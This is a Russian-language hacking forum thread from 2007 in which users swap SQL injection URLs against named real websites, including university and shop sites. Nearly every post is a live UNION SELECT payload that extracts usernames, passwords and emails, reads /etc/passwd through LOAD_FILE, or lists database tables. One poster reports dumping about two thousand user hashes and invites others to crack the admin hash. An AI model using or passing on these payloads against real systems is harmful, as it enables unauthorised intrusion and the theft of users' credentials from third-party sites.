01.03.2007, 22:50
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Сообщение от _Pantera_
http://www.farma-96.ru/index.php?main=catalogue&object=round&round_ID=-1+union+select+1,2,3,4,concat(name,0x3a,pass),6,7, 8,9,10+from+users+limit+1,1/*
пасс в чистом виде
пасиб за поправку 
хз, я просто копаться дальше не стал))
|
|
|
01.03.2007, 22:56
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
Код:
http://www.it-news.cc/index.php?type=article&ID=-1+union+select+user()/*
Код:
http://www.toxic.com.ua/news_view.php?i=-1+union+select+1,2,3,4
Код:
http://tony.proskaters.kiev.ua/index.php?details=-1+union+select+1,2,3,4,5,6/*
не смог подобрать названия таблиц
Код:
http://www.rshu.edu.ua/?p=10&sid='
|
|
|
|
01.03.2007, 23:07
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
http://www.widgetmonkey.com/detail.php?id=-5+union+select+1,2,LOAD_FILE('/etc/passwd'),4,5
папок на запись не нашёл
|
|
|
|
02.03.2007, 00:18
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
ошибка в mssql, стоит на винде
http://publicsafetyinfo.wvu.edu/Transcript/?id=1+or+1=(select+TOP+1+table_name+from+INFORMATI ON_SCHEMA.TABLES)--
|
|
|
|
02.03.2007, 00:49
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854
Репутация:
409
|
|
http://www.area3d.ch/downloads.php?cat=-99'+union+select+1,2,3/*
опять нифига не подобрал)) выведите юзеров булки лучше
|
|
|
|
02.03.2007, 01:06
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
2 _Pantera_
у меня этих скулей в эду доменах...
эта уже пару месяцев лежит, вот
http://moritzlaw.osu.edu/faculty/bios.php?ID=-99+union+select+1,2,3,password,username,6,7,8,9,10 ,11,12,13,14,15,16,17+from+access
|
|
|
|
02.03.2007, 01:08
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Код:
http://www.piratesinfo.com/biography/biography.php?article_id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+INFORMATION_SCHEMA.TABLES/*
можете покопаться  там много таблиц)
Код:
http://www.piratesinfo.com/biography/biography.php?article_id=-1+union+select+1,2,concat(username,0x3a,password,0x3a,email,0x3a,0x3a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+phorum_users/*
база 2к юзеров login:md5hash:email:: с форума
можете покопаться) хэш там расшифровать админский или другие таблицы глянуть..) я заколебался) |
|
|
|
02.03.2007, 02:37
|
|
Новичок
Регистрация: 01.03.2007
Сообщений: 2
Провел на форуме:
3478
Репутация:
0
|
|
http://chaoscity.chaosroad.com/kernel/class/class.mysql.php
Вообще реально,что нибудь дальше?...подскажите нубу =)
|
|
|
|
02.03.2007, 10:10
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
нет
|
|
|
|
02.03.2007, 14:20
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
__http://www.center-torg.ru/?pageId=2&catId=-1+union+select+1,table_name,3,4,5,6,7+from+INFORMA TION_SCHEMA.TABLES/*
__http://www.master-office.ru/index.php?l=2&pid=-1+union+select+1,2,user(),4,5,6,7/*
__http://www.kroki.ru/view_catalog.php?mtypeid=-1+union+select+1,concat(database(),char(58),user() ,char(58),version()),3,4,5/*
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
